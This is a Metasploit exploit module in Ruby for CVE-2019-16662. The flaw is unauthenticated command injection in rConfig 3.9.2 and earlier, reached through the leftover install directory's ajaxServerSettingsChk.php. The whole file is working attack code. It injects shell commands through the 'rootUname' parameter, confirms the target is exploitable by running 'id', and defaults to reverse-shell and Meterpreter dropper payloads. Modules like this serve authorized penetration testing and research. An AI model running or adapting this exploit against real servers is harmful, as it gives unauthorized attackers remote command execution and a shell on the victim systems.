##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'rConfig install Command Execution',
      'Description'    => %q{
        This module exploits an unauthenticated command injection vulnerability
        in rConfig versions 3.9.2 and prior. The <code>install</code> directory is not
        automatically removed after installation, allowing unauthenticated users
        to execute arbitrary commands via the <code>ajaxServerSettingsChk.php</code> file
        as the web server user.

        This module has been tested successfully on rConfig version 3.9.2 on
        CentOS 7.7.1908 (x64).
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'mhaskar', # Discovery and exploit
          'bcoles'   # Metasploit
        ],
      'References'     =>
        [
          ['CVE', '2019-16662'],
          ['EDB', '47555'],
          ['URL', 'https://gist.github.com/mhaskar/ceb65fa4ca57c3cdccc1edfe2390902e'],
          ['URL', 'https://shells.systems/rconfig-v3-9-2-authenticated-and-unauthenticated-rce-cve-2019-16663-and-cve-2019-16662/']
        ],
      'Platform'       => %w[unix linux],
      'Arch'           => [ARCH_CMD, ARCH_X86, ARCH_X64],
      'Payload'        => {'BadChars' => "\x00\x0a\x0d\x26"},
      'Targets'        =>
        [
          ['Automatic (Unix In-Memory)',
            'Platform' => 'unix',
            'Arch' => ARCH_CMD,
            'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse'},
            'Type' => :unix_memory
          ],
          ['Automatic (Linux Dropper)',
            'Platform' => 'linux',
            'Arch' => [ARCH_X86, ARCH_X64],
            'DefaultOptions' => {'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp'},
            'Type' => :linux_dropper
          ]
        ],
      'Privileged'     => false,
      'DefaultOptions' => { 'SSL' => true, 'RPORT' => 443 },
      'DisclosureDate' => '2019-10-28',
      'DefaultTarget'  => 0))
    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path to rConfig install directory', '/install/'])
      ])
  end

  def check
    res = execute_command('id')

    unless res
      vprint_error 'Connection failed'
      return CheckCode::Unknown
    end

    if res.code == 404
      vprint_error 'Could not find install directory'
      return CheckCode::Safe
    end

    cmd_res = res.body.scan(%r{The root details provided have not passed: (.+?)<\\/}).flatten.first

    unless cmd_res
      return CheckCode::Safe
    end

    vprint_status "Response: #{cmd_res}"

    unless cmd_res.include?('uid=')
      return CheckCode::Detected
    end

    CheckCode::Vulnerable
  end

  def execute_command(cmd, opts = {})
    vprint_status "Executing command: #{cmd}"
    send_request_cgi({
      'uri' => normalize_uri(target_uri.path, '/lib/ajaxHandlers/ajaxServerSettingsChk.php'),
      'vars_get' => {'rootUname' => ";#{cmd} #"}
    }, 5)
  end

  def exploit
    unless [CheckCode::Detected, CheckCode::Vulnerable].include? check
      fail_with Failure::NotVulnerable, "#{peer} - Target is not vulnerable"
    end

    case target['Type']
    when :unix_memory
      execute_command(payload.encoded)
    when :linux_dropper
      execute_cmdstager(:linemax => 1_500)
    end
  end
end